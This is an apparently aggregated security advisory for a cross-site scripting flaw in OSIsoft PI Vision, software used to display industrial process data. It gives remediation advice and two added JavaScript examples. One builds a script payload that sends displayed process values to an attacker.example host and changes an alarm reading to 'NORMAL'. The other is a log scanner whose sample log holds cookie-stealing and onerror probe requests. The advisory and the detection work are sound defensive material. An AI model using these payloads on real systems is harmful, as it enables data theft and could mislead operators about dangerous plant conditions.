OSIsoft PI Vision
CVSS 6.1 · ICS-CERT ICSA-18-072-03 · Mar 13, 2018
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: Required
Summary
PI Vision versions 2017 and earlier contain a cross-site scripting vulnerability (CWE-79) and a protection mechanism failure (CWE-693) leading to information disclosure (CWE-200) in the web interface. The XSS flaw allows an attacker to inject script that executes in the context of a logged-in user's browser session, from which it can read sensitive process data shown to that user or alter what the display presents. Exploitation requires user interaction (the victim must open a crafted link) but needs no authentication on the attacker's side, is performed over the network, and is low-complexity. OSIsoft recommends upgrading to PI Vision 2017 R2 Update 1.
What this means
What could happen
An attacker could read sensitive process data through PI Vision's web interface, or inject or alter displayed values to mislead operators about system status.
Who's at risk
Water utilities, electric utilities, and other critical infrastructure operators using OSIsoft PI Vision 2017 or earlier for real-time process visualization and monitoring should prioritize this update. PI Vision is commonly used to display live data from PLCs, RTUs, and historians across water treatment, power distribution, and manufacturing facilities.
How it could be exploited
An attacker could craft a malicious link or embed malicious script in web pages that PI Vision users visit. When an operator clicks the link or visits the page, the script runs in their browser within the PI Vision session, allowing the attacker to read sensitive process data or manipulate what the operator sees on screen.
Prerequisites
- User must click a malicious link or visit a compromised web page while logged into PI Vision
- The PI Vision web server must be reachable from the targeted user's browser; the attacker only needs a way to deliver the crafted link to that user (email, chat, or a page the operator visits)
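The reflected-XSS pattern described above, as an added illustration that is not PI Vision's or OSIsoft's code: a hypothetical server-side page template that interpolates a query-string parameter into HTML without encoding, beside the same template with output encoding. The function names, the `display` parameter, the `#tags` element and the attacker URL are assumptions chosen for the example; the payload shows what injected script can do once it runs inside the operator's session (read values already rendered, exfiltrate them, rewrite a value on screen).

```javascript
// Added example, not PI Vision's own code. Names, parameters and the
// payload are hypothetical.

// Encode the characters that let input break out of HTML text or
// attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the display name from the query string is dropped straight
// into the page, so markup in the parameter becomes markup in the page.
function renderDisplayVulnerable(query) {
  return `<h1>Display: ${query.display}</h1>` +
         `<div id="tags"><span class="tag-value">HIGH ALARM</span></div>`;
}

// Hardened: identical page, but the untrusted value is HTML-encoded.
function renderDisplayHardened(query) {
  return `<h1>Display: ${escapeHtml(query.display)}</h1>` +
         `<div id="tags"><span class="tag-value">HIGH ALARM</span></div>`;
}

// Constructed attacker payload. Once it executes in the victim's session it
// posts the rendered tag values to an attacker host and then overwrites an
// alarm state shown to the operator.
const PAYLOAD =
  '<script>' +
  'fetch("https://attacker.example/x?d=" +' +
  '  encodeURIComponent(document.getElementById("tags").innerText));' +
  'document.querySelector(".tag-value").textContent = "NORMAL";' +
  '</script>';

// The query string a crafted link would carry (assumed parameter name).
const CRAFTED_QUERY = { display: 'Plant Overview' + PAYLOAD };

// True when the rendered page contains an executable <script> element.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log('vulnerable renders script:', containsScriptTag(renderDisplayVulnerable(CRAFTED_QUERY)));
console.log('hardened renders script:  ', containsScriptTag(renderDisplayHardened(CRAFTED_QUERY)));
```

Encoding on output is the fix the upgrade applies on the server side; the example also makes the point that the attacker never authenticates to PI Vision. Everything the script reads or changes happens with the operator's existing session.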
remotely exploitable · no authentication required · low complexity · affects critical process visualization systems
Exploitability
Low exploit probability (EPSS 0.2%)
Affected products (1)
Product | Affected Versions | Fix Status
PI Vision | ≤ 2017 | 2017 R2 Update 1
Remediation & Mitigation
Do now
HARDENING: Train operators not to open unsolicited links to PI Vision, to reach displays only from known-good bookmarks, and to check the URL before signing in
Schedule — requires maintenance window
Upgrading may require restarting the PI Vision server; operator displays served by it are unavailable during the restart, so schedule the work when operators are not relying on them
HOTFIX: Upgrade PI Vision to version 2017 R2 Update 1 or later
Long-term hardening
HARDENING: Restrict network access to PI Vision web servers using firewall rules so that only trusted engineering and monitoring networks can reach them
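A check that pairs with the network restriction above, as an added example that is not part of the advisory or of OSIsoft's tooling: a scan of the web server's access log for the PI Vision site that flags requests carrying script markup in the query string (attempts at the XSS described in this advisory) and requests from clients outside the trusted networks the firewall rule is meant to enforce. It assumes the site is logged in IIS W3C format; the field order, the `/PIVision/` path, the addresses, the trusted subnet and the log lines themselves are constructed for the example.

```javascript
// Added example, not OSIsoft's code. Log layout, paths, addresses and
// the trusted subnet are assumptions.

const TRUSTED_CIDRS = ['10.10.20.0/24']; // hypothetical engineering/ops network

// Markup that has no business in a PI Vision query string.
const XSS_PATTERNS = [
  /<\s*script/i,
  /<\s*(img|svg|iframe|object|embed)\b/i,
  /javascript\s*:/i,
  /\bon[a-z]+\s*=/i, // onerror=, onload=, ...
];

// Dotted-quad IPv4 membership test for a CIDR block.
function ipInCidr(ip, cidr) {
  const [net, bits] = cidr.split('/');
  const toInt = a => a.split('.').reduce((n, o) => (n << 8) + Number(o), 0) >>> 0;
  const mask = bits === '0' ? 0 : (0xffffffff << (32 - Number(bits))) >>> 0;
  return (toInt(ip) & mask) === (toInt(net) & mask);
}

// Parse W3C extended log text; the #Fields: directive names the columns.
function parseW3C(text) {
  let fields = [];
  const rows = [];
  for (const line of text.split('\n')) {
    if (!line.trim()) continue;
    if (line.startsWith('#Fields:')) {
      fields = line.slice('#Fields:'.length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith('#')) continue;
    const cols = line.split(/\s+/);
    const row = {};
    fields.forEach((f, i) => { row[f] = cols[i]; });
    rows.push(row);
  }
  return rows;
}

// Decode the query the way the browser would before matching patterns.
function decodeQuery(q) {
  if (!q || q === '-') return '';
  const plusToSpace = q.replace(/\+/g, ' ');
  try { return decodeURIComponent(plusToSpace); } catch (e) { return plusToSpace; }
}

// Return one record per suspicious request with the reasons it was flagged.
function findSuspicious(text, trusted = TRUSTED_CIDRS) {
  const hits = [];
  for (const r of parseW3C(text)) {
    const query = decodeQuery(r['cs-uri-query']);
    const reasons = [];
    if (XSS_PATTERNS.some(p => p.test(query))) reasons.push('script markup in query');
    if (r['c-ip'] && !trusted.some(c => ipInCidr(r['c-ip'], c))) reasons.push('client outside trusted networks');
    if (reasons.length) {
      hits.push({ time: `${r.date} ${r.time}`, client: r['c-ip'], uri: r['cs-uri-stem'], query, reasons });
    }
  }
  return hits;
}

// Constructed sample log: two normal operator requests, one crafted link
// opened by an operator, one probe from an untrusted address.
const SAMPLE_LOG = `#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2018-03-14 08:12:03 10.10.1.5 GET /PIVision/ Displays=12 443 ops\\jdoe 10.10.20.14 Mozilla/5.0 200
2018-03-14 08:12:41 10.10.1.5 GET /PIVision/ Displays=12%3Cscript%3Efetch(%27https://attacker.example/%27%2Bdocument.cookie)%3C%2Fscript%3E 443 ops\\jdoe 10.10.20.14 Mozilla/5.0 200
2018-03-14 08:13:02 10.10.1.5 GET /PIVision/ q=x%22+onerror%3Dalert(1)+x%3D%22 443 - 192.0.2.77 curl/7.58.0 200
2018-03-14 08:13:30 10.10.1.5 GET /PIVision/ Displays=7 443 ops\\asmith 10.10.20.21 Mozilla/5.0 200
`;

console.log(JSON.stringify(findSuspicious(SAMPLE_LOG), null, 2));
```

The second flagged line is the interesting one from an incident-response view: the request came from an authenticated operator on the trusted subnet, which is exactly what a successful reflected-XSS delivery looks like. Network restriction alone does not stop it, which is why the upgrade, not the firewall rule, is the actual fix.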
CVEs (2)
API:
/api/v1/advisories/fe81bd9f-441d-40b8-b184-88078b2e1fd3